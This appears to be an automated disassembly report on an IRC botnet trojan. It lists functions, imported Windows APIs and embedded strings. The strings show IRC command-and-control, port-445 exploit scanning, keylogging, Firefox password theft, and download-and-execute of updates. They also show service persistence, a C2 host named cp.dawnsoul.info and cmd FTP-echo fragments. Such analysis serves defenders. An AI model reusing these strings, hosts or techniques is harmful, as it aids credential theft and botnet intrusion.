Index of %s</TIT"... "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""... "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"... "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"... "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"... ".." "." "PM" "AM" "%2.2d/%2.2d/%4d %2.2d:%2.2d %s" "<%s>" "PRIVMSG %s :%-31s %-21s\n" "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\"" "%s%s/" "\"><CODE>%.29s>/</CODE></A>" "\"><CODE>%s/</CODE></A>" "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"... "<%s>" "%-31s %-21s\r\n" "PRIVMSG %s :%-31s %-21s (%s bytes)\n" "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\"" "%s%s" "\"><CODE>%.30s></CODE></A>" "\"><CODE>%s</CODE></A>" "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"... "%-31s %-21s (%i bytes)\r\n" "PRIVMSG %s :Found %s Files and %s Direc"... "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"... "Found: %i Files and %i Directories\r\n" </pre></td></tr><tr id="sub_40AA51"><td><pre><a name="sub_40AA51"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AA51">sub_40AA51</a>(0e7b): "%s: %s stopped. (%d thread(s) stopped.)"... "%s: No %s thread found." </pre></td></tr><tr id="sub_4124BE"><td><pre><a name="sub_4124BE"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4124BE">sub_4124BE</a>(128c): KERNEL32.VirtualAlloc </pre></td></tr><tr id="sub_410733"><td><pre><a name="sub_410733"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_410733">sub_410733</a>(1310): NTDLL.RtlAllocateHeap </pre></td></tr><tr id="sub_40CA59"><td><pre><a name="sub_40CA59"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40CA59">sub_40CA59</a>(13dd): WS2_32.inet_addr WS2_32.htons WS2_32.socket WS2_32.connect WS2_32.recv WS2_32.send WS2_32.closesocket "svchost.exe" "password" "mircosoft" "ms.microsoft.com" "cmd /c echo open %s %d >> ii &echo user"... </pre></td></tr><tr id="sub_40A091"><td><pre><a name="sub_40A091"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A091">sub_40A091</a>(1439): "Bot sniff" "JOIN #" "302 " "366 " ".login" ".l" "scanning threads." "mIRC" "exploit" "exploiting" "JOIN # " "sets mode: " "Irc" "keylog" </pre></td></tr><tr id="sub_40C08F"><td><pre><a name="sub_40C08F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40C08F">sub_40C08F</a>(16f7): WS2_32.send </pre></td></tr><tr id="sub_4134BF"><td><pre><a name="sub_4134BF"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4134BF">sub_4134BF</a>(18c2): KERNEL32.SetFilePointer NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_4176B7"><td><pre><a name="sub_4176B7"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4176B7">sub_4176B7</a>(1915): KERNEL32.SetEndOfFile NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_408D3F"><td><pre><a name="sub_408D3F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408D3F">sub_408D3F</a>(1c57): "." "10" "172" "16" "192" "168" "90" "0" </pre></td></tr><tr id="sub_413F8C"><td><pre><a name="sub_413F8C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_413F8C">sub_413F8C</a>(1c6d): "exp" "exp" "log10" "log10" "log" "log" "pow" "pow" "pow" "log10" "log" "log2" "log2" "exp10" "exp2" "exp" "modf" "pow" "floor" "ceil" "atan" </pre></td></tr><tr id="sub_414DF9"><td><pre><a name="sub_414DF9"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414DF9">sub_414DF9</a>(1ce8): KERNEL32.MultiByteToWideChar </pre></td></tr><tr id="start"><td><pre><a name="start"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#start">start</a>(1edc): ADVAPI32.RegCreateKeyExA ADVAPI32.RegSetValueExA ADVAPI32.RegDeleteValueA ADVAPI32.RegCloseKey "WMI Performance Adapter Services" </pre></td></tr><tr id="sub_412407"><td><pre><a name="sub_412407"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_412407">sub_412407</a>(2299): NTDLL.RtlReAllocateHeap NTDLL.RtlAllocateHeap KERNEL32.VirtualAlloc NTDLL.RtlFreeHeap </pre></td></tr><tr id="sub_4017B6"><td><pre><a name="sub_4017B6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4017B6">sub_4017B6</a>(22cb): WS2_32.send "NOTICE" "PRIVMSG" "%s %s :%s\r\n" </pre></td></tr><tr id="sub_41207C"><td><pre><a name="sub_41207C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41207C">sub_41207C</a>(2585): NTDLL.RtlAllocateHeap </pre></td></tr><tr id="sub_414CA7"><td><pre><a name="sub_414CA7"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414CA7">sub_414CA7</a>(2923): KERNEL32.WideCharToMultiByte </pre></td></tr><tr id="sub_414A6F"><td><pre><a name="sub_414A6F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414A6F">sub_414A6F</a>(2d8c): KERNEL32.GetModuleFileNameA "C:\\m_unpacker\\packed.exe" </pre></td></tr><tr id="sub_40CD53"><td><pre><a name="sub_40CD53"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40CD53">sub_40CD53</a>(3167): WS2_32.send </pre></td></tr><tr id="sub_415B4C"><td><pre><a name="sub_415B4C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_415B4C">sub_415B4C</a>(32a7): KERNEL32.CreateFileA KERNEL32.GetFileType KERNEL32.CloseHandle NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_406761"><td><pre><a name="sub_406761"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_406761">sub_406761</a>(3310): KERNEL32.Sleep "/signons.txt" "/signons2.txt" "#2c" "#2d" "%s " ":" </pre></td></tr><tr id="sub_40479E"><td><pre><a name="sub_40479E"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40479E">sub_40479E</a>(334a): KERNEL32.Sleep "PASS %s\r\n" </pre></td></tr><tr id="sub_409C44"><td><pre><a name="sub_409C44"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409C44">sub_409C44</a>(3683): KERNEL32.GetTickCount </pre></td></tr><tr id="sub_414EC1"><td><pre><a name="sub_414EC1"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414EC1">sub_414EC1</a>(3bbd): KERNEL32.VirtualQuery KERNEL32.GetSystemInfo KERNEL32.VirtualAlloc KERNEL32.VirtualProtect </pre></td></tr><tr id="sub_416BBC"><td><pre><a name="sub_416BBC"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_416BBC">sub_416BBC</a>(3cd4): KERNEL32.LoadLibraryA KERNEL32.GetProcAddress "user32.dll" "MessageBoxA" "GetActiveWindow" "GetLastActivePopup" "GetUserObjectInformationA" "GetProcessWindowStation" </pre></td></tr><tr id="sub_40A920"><td><pre><a name="sub_40A920"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A920">sub_40A920</a>(3cd7): KERNEL32.TerminateThread WS2_32.closesocket </pre></td></tr><tr id="sub_411692"><td><pre><a name="sub_411692"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_411692">sub_411692</a>(3ffc): KERNEL32.GetCPInfo </pre></td></tr><tr id="sub_40C878"><td><pre><a name="sub_40C878"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40C878">sub_40C878</a>(4153): WS2_32.socket KERNEL32.Sleep "svchost.exe" "password" "mircosoft" "ms.microsoft.com" "cmd /k echo open %s %d > o&echo user %s"... "asn|445" "%s// %s." </pre></td></tr><tr id="sub_408E61"><td><pre><a name="sub_408E61"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408E61">sub_408E61</a>(43d7): KERNEL32.GetVersionExA "2" </pre></td></tr><tr id="sub_411FE8"><td><pre><a name="sub_411FE8"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_411FE8">sub_411FE8</a>(4634): KERNEL32.GetModuleHandleA KERNEL32.GetProcAddress "KERNEL32" "IsProcessorFeaturePresent" </pre></td></tr><tr id="sub_40752D"><td><pre><a name="sub_40752D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40752D">sub_40752D</a>(474d): KERNEL32.GetFileAttributesA KERNEL32.CreateFileA KERNEL32.GetFileSize KERNEL32.CloseHandle KERNEL32.CreateThread NTDLL.RtlGetLastWin32Error KERNEL32.Sleep "\\%s" "%s" "%s%s" "\n" "*" "Worker thread of s3rv3r thread: %d." "Failed to start work3r thread, error: <"... </pre></td></tr><tr id="sub_41602F"><td><pre><a name="sub_41602F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41602F">sub_41602F</a>(47fe): KERNEL32.GetCPInfo KERNEL32.MultiByteToWideChar KERNEL32.WideCharToMultiByte </pre></td></tr><tr id="sub_412ED1"><td><pre><a name="sub_412ED1"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_412ED1">sub_412ED1</a>(4979): KERNEL32.LCMapStringW NTDLL.RtlGetLastWin32Error KERNEL32.MultiByteToWideChar KERNEL32.WideCharToMultiByte KERNEL32.LCMapStringA </pre></td></tr><tr id="sub_415FE6"><td><pre><a name="sub_415FE6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_415FE6">sub_415FE6</a>(5463): KERNEL32.GetLocaleInfoA </pre></td></tr><tr id="sub_40B31C"><td><pre><a name="sub_40B31C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40B31C">sub_40B31C</a>(5483): KERNEL32.Sleep </pre></td></tr><tr id="sub_401073"><td><pre><a name="sub_401073"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401073">sub_401073</a>(550e): KERNEL32.CreateToolhelp32Snapshot KERNEL32.Module32First KERNEL32.SetFileAttributesA KERNEL32.OpenProcess KERNEL32.TerminateProcess KERNEL32.Sleep KERNEL32.DeleteFileA WS2_32.send KERNEL32.Module32Next KERNEL32.CloseHandle "PRIVMSG %s :T3rmina3d and del3t3d %s\n" </pre></td></tr><tr id="sub_411824"><td><pre><a name="sub_411824"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_411824">sub_411824</a>(559a): KERNEL32.GetOEMCP KERNEL32.GetACP KERNEL32.GetCPInfo </pre></td></tr><tr id="sub_409718"><td><pre><a name="sub_409718"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409718">sub_409718</a>(55bf): KERNEL32.OpenProcess KERNEL32.TerminateProcess KERNEL32.CloseHandle </pre></td></tr><tr id="sub_406425"><td><pre><a name="sub_406425"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_406425">sub_406425</a>(56a9): KERNEL32.GetProcAddress "nspr4.dll" "plds4.dll" "softokn3.dll" "NSS_Init" "NSS_Shutdown" "PK11_GetInternalKeySlot" "PK11_Authenticate" "PK11SDR_Decrypt" "PK11_CheckUserPassword" "PL_Base64Decode" </pre></td></tr><tr id="sub_416308"><td><pre><a name="sub_416308"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_416308">sub_416308</a>(573a): KERNEL32.RaiseException </pre></td></tr><tr id="sub_41202B"><td><pre><a name="sub_41202B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41202B">sub_41202B</a>(5769): KERNEL32.HeapCreate KERNEL32.HeapDestroy </pre></td></tr><tr id="sub_4056A2"><td><pre><a name="sub_4056A2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4056A2">sub_4056A2</a>(5c06): WININET.InternetOpenUrlA KERNEL32.CreateFileA KERNEL32.GetTickCount WININET.InternetReadFile KERNEL32.WriteFile KERNEL32.CloseHandle KERNEL32.CreateProcessA WS2_32.WSACleanup KERNEL32.ExitProcess WININET.InternetCloseHandle KERNEL32.ExitThread "Couldn't open file: %s." "File download: %s (%dKB transferred)." "Update: %s (%dKB transferred)." "Filesize is incorrect: (%d != %d)." "Downloaded %.1f KB to %s @ %.1f KB/sec."... "open" "Opened: %s." "Downloaded %.1fKB to %s @ %.1fKB/sec. U"... "Update failed: Error executing file: %s"... "Bad URL, or DNS Error: %s." </pre></td></tr><tr id="sub_4162B9"><td><pre><a name="sub_4162B9"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4162B9">sub_4162B9</a>(5cb8): KERNEL32.IsBadWritePtr </pre></td></tr><tr id="sub_41629D"><td><pre><a name="sub_41629D"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41629D">sub_41629D</a>(5cb8): KERNEL32.IsBadReadPtr </pre></td></tr><tr id="sub_40AD8F"><td><pre><a name="sub_40AD8F"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AD8F">sub_40AD8F</a>(5e8f): KERNEL32.GetTickCount NTDLL.RtlEnterCriticalSection NTDLL.RtlLeaveCriticalSection KERNEL32.Sleep KERNEL32.ExitThread "IP: %s:%d, Scan|t: %d, Sub|thread: %d." "IP %s, Port %d is 0p3n." "as445" </pre></td></tr><tr id="sub_405C48"><td><pre><a name="sub_405C48"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405C48">sub_405C48</a>(63f7): "%sKB" "failed" </pre></td></tr><tr id="sub_4161FE"><td><pre><a name="sub_4161FE"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4161FE">sub_4161FE</a>(6464): KERNEL32.SetFilePointer NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_414B11"><td><pre><a name="sub_414B11"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414B11">sub_414B11</a>(6487): KERNEL32.GetEnvironmentStringsW NTDLL.RtlGetLastWin32Error KERNEL32.WideCharToMultiByte KERNEL32.FreeEnvironmentStringsW KERNEL32.GetEnvironmentStrings KERNEL32.FreeEnvironmentStringsA </pre></td></tr><tr id="sub_40C7B0"><td><pre><a name="sub_40C7B0"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40C7B0">sub_40C7B0</a>(658a): "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"... </pre></td></tr><tr id="sub_405E21"><td><pre><a name="sub_405E21"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405E21">sub_405E21</a>(677a): KERNEL32.GetLogicalDriveStringsA "A:\\" </pre></td></tr><tr id="sub_401179"><td><pre><a name="sub_401179"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401179">sub_401179</a>(74f4): KERNEL32.OpenProcess KERNEL32.ReadProcessMemory WS2_32.send KERNEL32.Sleep KERNEL32.CloseHandle </pre></td></tr><tr id="sub_4120EF"><td><pre><a name="sub_4120EF"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4120EF">sub_4120EF</a>(76df): KERNEL32.VirtualFree NTDLL.RtlFreeHeap </pre></td></tr><tr id="sub_405FD6"><td><pre><a name="sub_405FD6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405FD6">sub_405FD6</a>(79bd): KERNEL32.FreeLibrary </pre></td></tr><tr id="sub_404BAB"><td><pre><a name="sub_404BAB"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_404BAB">sub_404BAB</a>(7e10): KERNEL32.GetTickCount KERNEL32.SetErrorMode WININET.InternetOpenA KERNEL32.GetModuleHandleA KERNEL32.GetModuleFileNameA KERNEL32.GetTempPathA KERNEL32.CreateMutexA KERNEL32.WaitForSingleObject ADVAPI32.GetUserNameA KERNEL32.lstrcmp KERNEL32.GetSystemDirectoryA KERNEL32.GetFileAttributesA KERNEL32.SetFileAttributesA NTDLL.RtlGetLastWin32Error KERNEL32.Sleep KERNEL32.CopyFileA KERNEL32.CloseHandle KERNEL32.DeleteFileA KERNEL32.GetCurrentProcessId KERNEL32.OpenProcess KERNEL32.CreateProcessA KERNEL32.ExitProcess WS2_32.WSAStartup ADVAPI32.RegCreateKeyExA ADVAPI32.RegSetValueExA ADVAPI32.RegCloseKey WS2_32.closesocket WS2_32.WSACleanup "Mozilla/4.0 (compatible)" "bawha" "CurrentUser" "InsideTm" "%s%s" "wmiapsrvs.exe" "wmiapsrvs.exe" "%s\\drivers\\%s" "%s %d \"%s\"" "WMI Performance Adapter Services" "%s:*:Enabled:%s" "SYSTEM\\CurrentControlSet\\Services\\Share"... "Shit started." "cp.dawnsoul.info" "s" "cp.dawnsoul.info" "s" "s" </pre></td></tr><tr id="sub_40E359"><td><pre><a name="sub_40E359"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40E359">sub_40E359</a>(8039): NTDLL.RtlFreeHeap </pre></td></tr><tr id="sub_406676"><td><pre><a name="sub_406676"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_406676">sub_406676</a>(8205): "~" </pre></td></tr><tr id="sub_40E6DD"><td><pre><a name="sub_40E6DD"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40E6DD">sub_40E6DD</a>(84dc): NTDLL.RtlAllocateHeap </pre></td></tr><tr id="sub_40AB1A"><td><pre><a name="sub_40AB1A"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40AB1A">sub_40AB1A</a>(8826): KERNEL32.ExitThread </pre></td></tr><tr id="sub_408EF0"><td><pre><a name="sub_408EF0"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408EF0">sub_408EF0</a>(89c1): KERNEL32.Sleep KERNEL32.SetFileAttributesA KERNEL32.CreateFileA KERNEL32.GetFileTime KERNEL32.CloseHandle KERNEL32.SetFileTime KERNEL32.ExitThread "�" "G" "r+b" "Can not open TCPIP.SYS, version %d." "TCPIP.SYS fixed!, version %d." </pre></td></tr><tr id="sub_40F144"><td><pre><a name="sub_40F144"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40F144">sub_40F144</a>(8af0): NTDLL.RtlUnwind </pre></td></tr><tr id="sub_415F30"><td><pre><a name="sub_415F30"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_415F30">sub_415F30</a>(8bf1): KERNEL32.SetStdHandle </pre></td></tr><tr id="sub_4077DC"><td><pre><a name="sub_4077DC"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4077DC">sub_4077DC</a>(9457): KERNEL32.ExitThread "GET " " " "\r\n" "Error: shit failed, returned: <%d>." </pre></td></tr><tr id="sub_412DF3"><td><pre><a name="sub_412DF3"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_412DF3">sub_412DF3</a>(947c): KERNEL32.CloseHandle NTDLL.RtlGetLastWin32Error </pre></td></tr><tr id="sub_409EEB"><td><pre><a name="sub_409EEB"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409EEB">sub_409EEB</a>(948a): WS2_32.socket WS2_32.ioctlsocket WS2_32.connect KERNEL32.Sleep WS2_32.closesocket </pre></td></tr><tr id="sub_410364"><td><pre><a name="sub_410364"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_410364">sub_410364</a>(9ab4): KERNEL32.GetStartupInfoA KERNEL32.GetFileType KERNEL32.GetStdHandle KERNEL32.LockResource </pre></td></tr><tr id="sub_407C63"><td><pre><a name="sub_407C63"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_407C63">sub_407C63</a>(9ac9): ADVAPI32.RegOpenKeyExA ADVAPI32.RegQueryValueExA ADVAPI32.RegCloseKey "SOFTWARE\\Microsoft\\Windows NT\\CurrentVe"... "DigitalProductId" </pre></td></tr><tr id="sub_409650"><td><pre><a name="sub_409650"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409650">sub_409650</a>(9b13): KERNEL32.ExitThread "Listing ps:" "Ps list completed." </pre></td></tr><tr id="sub_40A5BD"><td><pre><a name="sub_40A5BD"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A5BD">sub_40A5BD</a>(9b6d): KERNEL32.GetTickCount "%dd %dh %dm" </pre></td></tr><tr id="sub_407D3E"><td><pre><a name="sub_407D3E"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_407D3E">sub_407D3E</a>(9bc2): KERNEL32.GetModuleHandleA KERNEL32.GetProcAddress NTDLL.RtlGetLastWin32Error KERNEL32.LoadLibraryA "kernel32.dll" "SetErrorMode" "CreateToolhelp32Snapshot" "Process32First" "GetDiskFreeSpaceExA" "GetLogicalDriveStringsA" "SearchPathA" "QueryPerformanceCounter" "QueryPerformanceFrequency" "RegisterServiceProcess" "user32.dll" "SendMessageA" "FindWindowA" "IsWindow" "GetClipboardData" "CloseClipboard" "GetAsyncKeyState" "GetKeyState" "GetWindowTextA" "GetForegroundWindow" "userenv.dll" "GetUserProfileDirectoryA" "advapi32.dll" "RegCreateKeyExA" "RegSetValueExA" "RegQueryValueExA" "RegDeleteValueA" "RegCloseKey" "OpenProcessToken" "LookupPrivilegeValueA" "AdjustTokenPrivileges" "OpenSCManagerA" "OpenServiceA" "ControlService" "CloseServiceHandle" "EnumServicesStatusA" "IsValidSecurityDescriptor" "GetUserNameA" "gdi32.dll" "CreateDCA" "CreateDIBSection" "CreateCompatibleDC" "GetDIBColorTable" "SelectObject" "BitBlt" "DeleteDC" "DeleteObject" "ws2_32.dll" "WSAStartup" "WSASocketA" "WSAAsyncSelect" "__WSAFDIsSet" "WSAIoctl" "WSAGetLastError" "WSACleanup" "socket" "ioctlsocket" "connect" "inet_ntoa" "inet_addr" "htons" "htonl" "ntohs" "ntohl" "send" "sendto" "recv" "recvfrom" "bind" "select" "listen" "accept" "setsockopt" "getsockname" "gethostname" "getpeername" "closesocket" "wininet.dll" "InternetGetConnectedState" "InternetGetConnectedStateEx" "HttpOpenRequestA" "HttpSendRequestA" "InternetConnectA" "InternetOpenUrlA" "InternetCrackUrlA" "InternetReadFile" "InternetCloseHandle" "Mozilla/4.0 (compatible)" "netapi32.dll" "NetShareAdd" "NetShareDel" "NetShareEnum" "NetScheduleJobAdd" "NetApiBufferFree" "NetRemoteTOD" "NetUserAdd" "NetUserDel" "NetUserEnum" "NetUserGetInfo" "NetMessageBufferSend" "dnsapi.dll" "DnsFlushResolverCache" "DnsFlushResolverCacheEntry_A" "iphlpapi.dll" "DeleteIpNetEntry" "mpr.dll" "WNetAddConnection2A" "WNetAddConnection2W" "WNetCancelConnection2A" "WNetCancelConnection2W" "shell32.dll" "SHChangeNotify" "odbc32.dll" "SQLDriverConnect" "SQLAllocHandle" </pre></td></tr><tr id="sub_408AC2"><td><pre><a name="sub_408AC2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408AC2">sub_408AC2</a>(9d9d): KERNEL32.CreateFileA KERNEL32.GetFileTime KERNEL32.CloseHandle KERNEL32.SetFileTime "explorer.exe" </pre></td></tr><tr id="sub_415EB9"><td><pre><a name="sub_415EB9"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_415EB9">sub_415EB9</a>(a140): KERNEL32.SetStdHandle </pre></td></tr><tr id="sub_401822"><td><pre><a name="sub_401822"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401822">sub_401822</a>(a6d5): "%s%s%s" "%s%s" </pre></td></tr><tr id="sub_414F92"><td><pre><a name="sub_414F92"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414F92">sub_414F92</a>(a788): NTDLL.RtlAllocateHeap NTDLL.RtlReAllocateHeap </pre></td></tr><tr id="sub_404901"><td><pre><a name="sub_404901"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_404901">sub_404901</a>(ab7a): WS2_32.htons WS2_32.inet_addr WS2_32.gethostbyname WS2_32.gethostbyaddr WS2_32.socket WS2_32.connect WS2_32.closesocket KERNEL32.GetSystemDirectoryA KERNEL32.CreateThread KERNEL32.Sleep "%s\\drivers\\tcpip.sys" "tcpip patcher!!" </pre></td></tr><tr id="sub_409427"><td><pre><a name="sub_409427"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_409427">sub_409427</a>(abe8): KERNEL32.lstrcmpi KERNEL32.OpenProcess KERNEL32.TerminateProcess KERNEL32.CloseHandle KERNEL32.Module32First "SeDebugPrivilege" " %s (%d)" "SeDebugPrivilege" </pre></td></tr><tr id="sub_40F6D4"><td><pre><a name="sub_40F6D4"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40F6D4">sub_40F6D4</a>(aeff): KERNEL32.RaiseException </pre></td></tr><tr id="sub_40A1B0"><td><pre><a name="sub_40A1B0"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40A1B0">sub_40A1B0</a>(b0ed): "IRC sn" "OPER " "NICK " "oper " "You are now an IRC Operator" </pre></td></tr><tr id="sub_4073C5"><td><pre><a name="sub_4073C5"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4073C5">sub_4073C5</a>(b1ed): KERNEL32.GetDateFormatA KERNEL32.GetTimeFormatA KERNEL32.ExitThread "text/html" "application/octet-stream" "ddd, dd MMM yyyy" "HH:mm:ss" "HTTP/1.0 200 OK\r\nServer: myShit\r\nCache-"... "HTTP/1.0 200 OK\r\nServer: myShit\r\nCache-"... </pre></td></tr><tr id="sub_40600B"><td><pre><a name="sub_40600B"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40600B">sub_40600B</a>(b282): KERNEL32.LoadLibraryA "/" </pre></td></tr><tr id="sub_405BB7"><td><pre><a name="sub_405BB7"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405BB7">sub_405BB7</a>(b2db): KERNEL32.GetDriveTypeA "?" "RAM" "Cdrom" "Network" "Disk" "Invalid" "Unknown" </pre></td></tr><tr id="sub_405E94"><td><pre><a name="sub_405E94"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_405E94">sub_405E94</a>(b879): ADVAPI32.RegOpenKeyExA ADVAPI32.RegQueryValueExA ADVAPI32.RegCloseKey "SOFTWARE\\Clients\\StartMenuInternet\\fire"... </pre></td></tr><tr id="sub_401648"><td><pre><a name="sub_401648"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_401648">sub_401648</a>(b92d): KERNEL32.GetLocalTime "[%d-%d-%d %d:%d:%d] %s" </pre></td></tr><tr id="sub_4152E6"><td><pre><a name="sub_4152E6"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4152E6">sub_4152E6</a>(b9df): KERNEL32.GetSystemTimeAsFileTime KERNEL32.GetCurrentProcessId KERNEL32.GetCurrentThreadId KERNEL32.GetTickCount KERNEL32.QueryPerformanceCounter </pre></td></tr><tr id="sub_41512C"><td><pre><a name="sub_41512C"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_41512C">sub_41512C</a>(bf7b): KERNEL32.GetStringTypeW NTDLL.RtlGetLastWin32Error KERNEL32.MultiByteToWideChar KERNEL32.GetStringTypeA </pre></td></tr><tr id="sub_4013E5"><td><pre><a name="sub_4013E5"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4013E5">sub_4013E5</a>(c1da): KERNEL32.OpenProcess KERNEL32.ReadProcessMemory WS2_32.send KERNEL32.Sleep KERNEL32.CloseHandle "PRIVMSG %s :Found string \"%s\" in \"%s\" \n"... </pre></td></tr><tr id="sub_40DDA2"><td><pre><a name="sub_40DDA2"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_40DDA2">sub_40DDA2</a>(c20d): KERNEL32.GetCurrentProcess KERNEL32.TerminateProcess </pre></td></tr><tr id="sub_414662"><td><pre><a name="sub_414662"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_414662">sub_414662</a>(c327): KERNEL32.CloseHandle KERNEL32.UnhandledExceptionFilter </pre></td></tr><tr id="sub_408EA9"><td><pre><a name="sub_408EA9"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_408EA9">sub_408EA9</a>(c854): KERNEL32.MultiByteToWideChar KERNEL32.LoadLibraryA KERNEL32.GetProcAddress "sfc_os.dll" </pre></td></tr><tr id="sub_4016B8"><td><pre><a name="sub_4016B8"></a><a href="dd186cd27273e85b7a730e39a205469c_unpacked.asm.html#sub_4016B8">sub_4016B8</a>(c9a2): WS2_32.send "%s\r\n" 